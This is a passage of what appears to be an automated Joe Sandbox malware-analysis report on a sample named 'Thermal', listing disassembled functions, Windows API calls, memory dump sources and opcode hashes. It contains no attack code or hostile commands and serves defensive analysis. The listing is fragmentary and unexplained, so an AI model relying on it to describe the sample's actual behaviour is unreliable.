                                                  • Part of subcall function 00784AB2: __fread_nolock.LIBCMT ref: 00784AD0
                                                • _wcscmp.LIBCMT ref: 007D9DE1
                                                • _wcscmp.LIBCMT ref: 007D9DF4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: _wcscmp$__fread_nolock
                                                • String ID: FILE
                                                • API String ID: 4029003684-3121273764
                                                • Opcode ID: 08bb2280de11eed4e8a9fb55c056cdac80a536a922600a179c0dd09e184dfb43
                                                • Instruction ID: e152e9df3fca6ca2450634e3d1d566c437a9cd4aeae447c6c4c8823e0cf7f848
                                                • Opcode Fuzzy Hash: 08bb2280de11eed4e8a9fb55c056cdac80a536a922600a179c0dd09e184dfb43
                                                • Instruction Fuzzy Hash: D841D972A4021AFADF21EAE4CC49FDF7BBDEF45710F00446AFA00BB281D67999448765
                                                APIs
                                                • _memset.LIBCMT ref: 007C032B
                                                • GetOpenFileNameW.COMDLG32(?), ref: 007C0375
                                                  • Part of subcall function 00790284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00782A58,?,00008000), ref: 007902A4
                                                  • Part of subcall function 007909C5: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 007909E4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Name$Path$FileFullLongOpen_memset
                                                • String ID: X
                                                • API String ID: 3777226403-3081909835
                                                • Opcode ID: 3e8675e6d6b8338c15139361ac044abaa6204b00413a5a84d70eb1ef96013dbc
                                                • Instruction ID: 5bcf1942f814b1a1f9a3d16a1b6b64fd76271beba51ec41e40585f88dcddd953
                                                • Opcode Fuzzy Hash: 3e8675e6d6b8338c15139361ac044abaa6204b00413a5a84d70eb1ef96013dbc
                                                • Instruction Fuzzy Hash: 04218171A142989BDF41DFD8D849BEE7BFCAF49710F00405AE504E7241DBB85A89CFA1
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a4dcc147a05a5c7cb56a5dbcbdf6352f3062197fe3422dd926b515c92163c949
                                                • Instruction ID: eb47c197e284dd6059f8fadd1c8c770a5abfae1e73500e8387f65c1e6467cd2f
                                                • Opcode Fuzzy Hash: a4dcc147a05a5c7cb56a5dbcbdf6352f3062197fe3422dd926b515c92163c949
                                                • Instruction Fuzzy Hash: 77F12570608340DFCB24DF29C484A6ABBE5BF89354F14892EF8999B251D734ED45CF92
                                                APIs
                                                • _memset.LIBCMT ref: 007859F9
                                                • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00785A9E
                                                • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00785ABB
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: IconNotifyShell_$_memset
                                                • String ID:
                                                • API String ID: 1505330794-0
                                                • Opcode ID: 5ed034ddc7cb086f6dec84a1b163ac98876e346c823c16a0f7de95d1df540e3f
                                                • Instruction ID: 72354979800def0c80197d01cc0d4f6a4f2d88627ccc2b2214f71ed0fd8f7bac
                                                • Opcode Fuzzy Hash: 5ed034ddc7cb086f6dec84a1b163ac98876e346c823c16a0f7de95d1df540e3f
                                                • Instruction Fuzzy Hash: 4F316FB0605B01DFD765EF24D8C4697BBE8FB48308F004E2EF99A86250E775A944CB92
                                                APIs
                                                • __FF_MSGBANNER.LIBCMT ref: 00795953
                                                  • Part of subcall function 0079A39B: __NMSG_WRITE.LIBCMT ref: 0079A3C2
                                                  • Part of subcall function 0079A39B: __NMSG_WRITE.LIBCMT ref: 0079A3CC
                                                • __NMSG_WRITE.LIBCMT ref: 0079595A
                                                  • Part of subcall function 0079A3F8: GetModuleFileNameW.KERNEL32(00000000,008353BA,00000104,00000004,00000001,00791003), ref: 0079A48A
                                                  • Part of subcall function 0079A3F8: ___crtMessageBoxW.LIBCMT ref: 0079A538
                                                  • Part of subcall function 007932CF: ___crtCorExitProcess.LIBCMT ref: 007932D5
                                                  • Part of subcall function 007932CF: ExitProcess.KERNEL32 ref: 007932DE
                                                  • Part of subcall function 00798D58: __getptd_noexit.LIBCMT ref: 00798D58
                                                • RtlAllocateHeap.NTDLL(00D70000,00000000,00000001,?,00000004,?,?,00791003,?), ref: 0079597F
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                • String ID:
                                                • API String ID: 1372826849-0
                                                • Opcode ID: 9d926de14c84145b38b32cac6a2fa1568d6bcee525ebb009146b60e71c238404
                                                • Instruction ID: 9f3462843a1c049bc066d6b7564ad34eb66c745e715640f0ba430b5301a4a7c4
                                                • Opcode Fuzzy Hash: 9d926de14c84145b38b32cac6a2fa1568d6bcee525ebb009146b60e71c238404
                                                • Instruction Fuzzy Hash: 6B01B531341B22EAFE122B34BC46B2E33589F96770F510526F4199B2D1DE7CAD004761
                                                APIs
                                                • _free.LIBCMT ref: 007D92D6
                                                  • Part of subcall function 00792F85: RtlFreeHeap.NTDLL(00000000,00000000,?,00799C54,00000000,00798D5D,007959C3), ref: 00792F99
                                                  • Part of subcall function 00792F85: GetLastError.KERNEL32(00000000,?,00799C54,00000000,00798D5D,007959C3), ref: 00792FAB
                                                • _free.LIBCMT ref: 007D92E7
                                                • _free.LIBCMT ref: 007D92F9
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast
                                                • String ID:
                                                • API String ID: 776569668-0
                                                • Opcode ID: d545b8d0ab5e92762063c3ba8b14d4eaebd98453bfde93cefd35328ad8659e4d
                                                • Instruction ID: df60bc8030d465a8eb60c729a0ae9799c68891edfbeaab5178e83e1983b4a1fc
                                                • Opcode Fuzzy Hash: d545b8d0ab5e92762063c3ba8b14d4eaebd98453bfde93cefd35328ad8659e4d
                                                • Instruction Fuzzy Hash: C1E012A1705602A7CE24B5797984E9377FC5F88751715051EB50AE7643DE2CF8428168
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: CALL
                                                • API String ID: 0-4196123274
                                                • Opcode ID: 7e7c9714219a2e21d741483a8ed1d66978c08a805a9504f07a596b55a26caa0a
                                                • Instruction ID: ee7de29d5d44737c5509cf72f00753b082bcf586e5f810473b4dabdffe786bbd
                                                • Opcode Fuzzy Hash: 7e7c9714219a2e21d741483a8ed1d66978c08a805a9504f07a596b55a26caa0a
                                                • Instruction Fuzzy Hash: 03325770608741DFCB24DF14C494A2ABBE1BF85384F14C96DE88A9B366D779EC45CB82
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: _memmove
                                                • String ID: EA06
                                                • API String ID: 4104443479-3962188686
                                                • Opcode ID: 7beb2c50642d487a0b3944c883c1f43f0c584e6448ad67843e3feaa5bd8ed436
                                                • Instruction ID: 57c9bdcdb0a16cebfde73c4b34fd8a37e48b1bbf6d9baa61e47d50dc364ccf9e
                                                • Opcode Fuzzy Hash: 7beb2c50642d487a0b3944c883c1f43f0c584e6448ad67843e3feaa5bd8ed436
                                                • Instruction Fuzzy Hash: CD41A032A44159EBDF31AB5488557BF7FA59F45300F588079E8C1EB286D6AC9D8083E2
                                                APIs
                                                • _strcat.LIBCMT ref: 007EE20C
                                                  • Part of subcall function 00774D37: __itow.LIBCMT ref: 00774D62
                                                  • Part of subcall function 00774D37: __swprintf.LIBCMT ref: 00774DAC
                                                • _wcscpy.LIBCMT ref: 007EE29B
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: __itow__swprintf_strcat_wcscpy
                                                • String ID:
                                                • API String ID: 1012013722-0
                                                • Opcode ID: 9fb0d1f0243b798c329c8fbec0ce202dfcd8ba05215f929c354fe7824ec0a317
                                                • Instruction ID: 7c1ebe1231eaa13b5b67e4e035a20d6b50a2afaceef601f7b5b30dc9efb719f3
                                                • Opcode Fuzzy Hash: 9fb0d1f0243b798c329c8fbec0ce202dfcd8ba05215f929c354fe7824ec0a317
                                                • Instruction Fuzzy Hash: 72913835A00604DFCB28DF29C5859ADB7E5FF49310B95C45AE85A8F362DB38ED41CB81
                                                APIs
                                                • IsThemeActive.UXTHEME ref: 00785FEF
                                                  • Part of subcall function 0079359C: __lock.LIBCMT ref: 007935A2
                                                  • Part of subcall function 0079359C: DecodePointer.KERNEL32(00000001,?,00786004,007C8892), ref: 007935AE
                                                  • Part of subcall function 0079359C: EncodePointer.KERNEL32(?,?,00786004,007C8892), ref: 007935B9
                                                  • Part of subcall function 00785F00: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00785F18
                                                  • Part of subcall function 00785F00: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00785F2D
                                                  • Part of subcall function 00785240: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0078526C
                                                  • Part of subcall function 00785240: IsDebuggerPresent.KERNEL32 ref: 0078527E
                                                  • Part of subcall function 00785240: GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 007852E6
                                                  • Part of subcall function 00785240: SetCurrentDirectoryW.KERNEL32(?), ref: 00785366
                                                • SystemParametersInfoW.USER32(00002001,00000000,?,00000002), ref: 0078602F
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                • String ID:
                                                • API String ID: 1438897964-0
                                                • Opcode ID: 9fcb2305502223eed009e0cab26ff6b800c5842ec52e94879fff9f8740b57ebd
                                                • Instruction ID: 6a17aa5638acaefe13f3eec59cf7bd6b387991bf4d4689edc7af93c08ee91586
                                                • Opcode Fuzzy Hash: 9fcb2305502223eed009e0cab26ff6b800c5842ec52e94879fff9f8740b57ebd
                                                • Instruction Fuzzy Hash: 1F1159B1908345DBC720EF69EC4990ABBE8FFD8750F00891EF585872B2DB749544CB96
                                                APIs
                                                • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,?,?,00783E72,?,?,?,00000000), ref: 00784327
                                                • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,00000000,?,?,00783E72,?,?,?,00000000), ref: 007C0717
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: CreateFile
                                                • String ID:
                                                • API String ID: 823142352-0
                                                • Opcode ID: 0673fc83ff692512bf674850c0f272405675e6d37cc618dd561efbd3cc51353f
                                                • Instruction ID: 58d4adf771f45040217a60457720c0884e84a5ee9950dec74421cbebc24a09e4
                                                • Opcode Fuzzy Hash: 0673fc83ff692512bf674850c0f272405675e6d37cc618dd561efbd3cc51353f
                                                • Instruction Fuzzy Hash: 6201527028430ABEF7641E24DC8AF667B9CEB0576CF10C319FAE56A1E0C6F99C458B54
                                                APIs
                                                  • Part of subcall function 0079593C: __FF_MSGBANNER.LIBCMT ref: 00795953
                                                  • Part of subcall function 0079593C: __NMSG_WRITE.LIBCMT ref: 0079595A
                                                  • Part of subcall function 0079593C: RtlAllocateHeap.NTDLL(00D70000,00000000,00000001,?,00000004,?,?,00791003,?), ref: 0079597F
                                                • std::exception::exception.LIBCMT ref: 0079101C
                                                • __CxxThrowException@8.LIBCMT ref: 00791031
                                                  • Part of subcall function 007987CB: RaiseException.KERNEL32(?,?,?,0082CAF8,?,?,?,?,?,00791036,?,0082CAF8,?,00000001), ref: 00798820
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                • String ID:
                                                • API String ID: 3902256705-0
                                                • Opcode ID: e87f41448aecd6891138aba31acc0ab3121e39bb6793990ba10032b290726f19
                                                • Instruction ID: d678c6ed0a0316b4e6656a728fc1d81cbd68ed49e4dc1794b83d2eab7e8afa1e
                                                • Opcode Fuzzy Hash: e87f41448aecd6891138aba31acc0ab3121e39bb6793990ba10032b290726f19
                                                • Instruction Fuzzy Hash: 64F0813550421EE6CF20AA98FC1A99E7BACAF01310F500459FD24D6291DFB99B94C2E1
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: __lock_file_memset
                                                • String ID:
                                                • API String ID: 26237723-0
                                                • Opcode ID: d219f870801d0d3109a5f858ef666f8e509b6ca2c164f6514409aa45397a0ae9
                                                • Instruction ID: b25c45233f5866a10596686c84d98fb41be484de8e562d638a162cf1d7acbd6f
                                                • Opcode Fuzzy Hash: d219f870801d0d3109a5f858ef666f8e509b6ca2c164f6514409aa45397a0ae9
                                                • Instruction Fuzzy Hash: AA018471801A18EBCF12AF69FC09C9E7B61AF81760F184216F8245A1A1D7398A21DF91
                                                APIs
                                                  • Part of subcall function 00798D58: __getptd_noexit.LIBCMT ref: 00798D58
                                                • __lock_file.LIBCMT ref: 0079560B
                                                  • Part of subcall function 00796E3E: __lock.LIBCMT ref: 00796E61
                                                • __fclose_nolock.LIBCMT ref: 00795616
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                • String ID:
                                                • API String ID: 2800547568-0
                                                • Opcode ID: 21630cf09e124bb6c2c50934fe699539c94fc073d865b081df6d238e2dee38fe
                                                • Instruction ID: be898261e7ecbb440ca7b68b90343d5f657d0ca01070da3130e6abaa730c4770
                                                • Opcode Fuzzy Hash: 21630cf09e124bb6c2c50934fe699539c94fc073d865b081df6d238e2dee38fe
                                                • Instruction Fuzzy Hash: EEF0B471901B25DADF527B79B80AB6E77A26F41730F168209F824AB1C2CB7C4A419F52
                                                APIs
                                                • __lock_file.LIBCMT ref: 00795EB4
                                                • __ftell_nolock.LIBCMT ref: 00795EBF
                                                  • Part of subcall function 00798D58: __getptd_noexit.LIBCMT ref: 00798D58
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: __ftell_nolock__getptd_noexit__lock_file
                                                • String ID:
                                                • API String ID: 2999321469-0
                                                • Opcode ID: d073b907152be0ef83920f02361e67b3b659c50961dcef9ddb0083fcf0d7e5cf
                                                • Instruction ID: abbe48f266128d07d0976ffe789939bf475f191d7b64b04898c8bfa913e99399
                                                • Opcode Fuzzy Hash: d073b907152be0ef83920f02361e67b3b659c50961dcef9ddb0083fcf0d7e5cf
                                                • Instruction Fuzzy Hash: D6F0A771911625DADF41BB74A80B75E76906F02331F254307B424EF1C2CF7C4A419B56
                                                APIs
                                                • _memset.LIBCMT ref: 00785AEF
                                                • Shell_NotifyIconW.SHELL32(00000002,?), ref: 00785B1F
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: IconNotifyShell__memset
                                                • String ID:
                                                • API String ID: 928536360-0
                                                • Opcode ID: cfdab443a1912d62fe5af922a9683b0acbab904fb9e895b48b170b3e65c03aed
                                                • Instruction ID: be90293254a7d2af330554e219f162d4de28543c40f2f41ad0324293daa26d2f
                                                • Opcode Fuzzy Hash: cfdab443a1912d62fe5af922a9683b0acbab904fb9e895b48b170b3e65c03aed
                                                • Instruction Fuzzy Hash: 91F0A7B08083089FE7A2DB64DC497967BBCA70030CF0001E9AA4996292DB754B88CF55
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: CloseHandleSleep
                                                • String ID:
                                                • API String ID: 252777609-0
                                                • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                • Instruction ID: ef3d6b4960996536f0d07e7bad0402ac624b6314dbb6f99fe93a4306aea7e510
                                                • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                • Instruction Fuzzy Hash: 3A31C371A10109DFDB18EF58E484969F7A6FF59300B648AA5E40ACB351EB35EEC1CBC0
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: LoadString$__swprintf
                                                • String ID:
                                                • API String ID: 207118244-0
